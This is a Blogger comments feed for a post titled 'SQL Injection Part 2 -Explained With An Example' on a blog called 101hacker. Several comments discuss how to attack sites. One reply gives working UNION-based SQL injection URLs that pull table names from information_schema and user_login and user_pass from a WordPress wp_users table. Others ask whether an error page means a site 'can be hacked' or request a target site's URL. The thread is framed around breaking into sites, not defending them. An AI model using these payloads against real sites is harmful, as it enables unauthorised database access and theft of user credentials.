tag:blogger.com,1999:blog-454571123505221237.post5188840990038158372..comments2024-03-09T01:53:49.067-08:00Comments on 101hacker : SQL Injection Part 2 -Explained With An ExampleJohn ( Admin )http://www.blogger.com/profile/03076980956918574731noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-454571123505221237.post-10078791901661966012012-12-26T03:34:28.473-08:002012-12-26T03:34:28.473-08:00Hi bro just want to ask some details regarding fin...Hi bro just want to ask some details regarding finding about table name...<br /><br />www.vulnerablesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—<br /><br />on your example above you replaced "2" with table_name<br />is "table_name" a predefine parameter in SQL?<br /><br />same question regarding information_schema.tables (is this also a predefine parameter?)<br /><br />because if it is then I assume it will always work.<br /><br />Thanks bro<br />ANONhttps://www.blogger.com/profile/14052970700201039266noreply@blogger.comtag:blogger.com,1999:blog-454571123505221237.post-53932679774745274522012-11-26T06:13:41.621-08:002012-11-26T06:13:41.621-08:00pplease write url or pm me in google of this sitepplease write url or pm me in google of this siteAnonymoushttps://www.blogger.com/profile/01342877125802295376noreply@blogger.comtag:blogger.com,1999:blog-454571123505221237.post-27223959545869780272012-08-19T21:30:36.155-07:002012-08-19T21:30:36.155-07:00hi bro when i put an ' in the end of url if it...hi bro when i put an ' in the end of url if it get error page can i hack itphaninaiduhttps://www.blogger.com/profile/17196738628595936402noreply@blogger.comtag:blogger.com,1999:blog-454571123505221237.post-72568024416486274882011-11-09T02:28:33.091-08:002011-11-09T02:28:33.091-08:00@Anonymous
Bro read it completely....
the followin...@Anonymous<br />Bro read it completely....<br />the following query gives you the user name.<br />www.vulnerablesite.com/view.php?id=-47 union select 1,user_login ,3,4,5,6,7,8,9 from wp_users—<br /><br />By replacing "user_login" with "user_pass" in the same query.. u can get the password. :)srini0x00https://www.blogger.com/profile/13336211464163885996noreply@blogger.comtag:blogger.com,1999:blog-454571123505221237.post-36818073594852607662011-11-08T09:05:11.543-08:002011-11-08T09:05:11.543-08:00its not complete how to get the password tell the ...its not complete how to get the password tell the last step alsoAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-454571123505221237.post-91462738820235962182011-11-02T02:05:41.208-07:002011-11-02T02:05:41.208-07:00Thanks this helpd me :)Thanks this helpd me :)Anonymousnoreply@blogger.com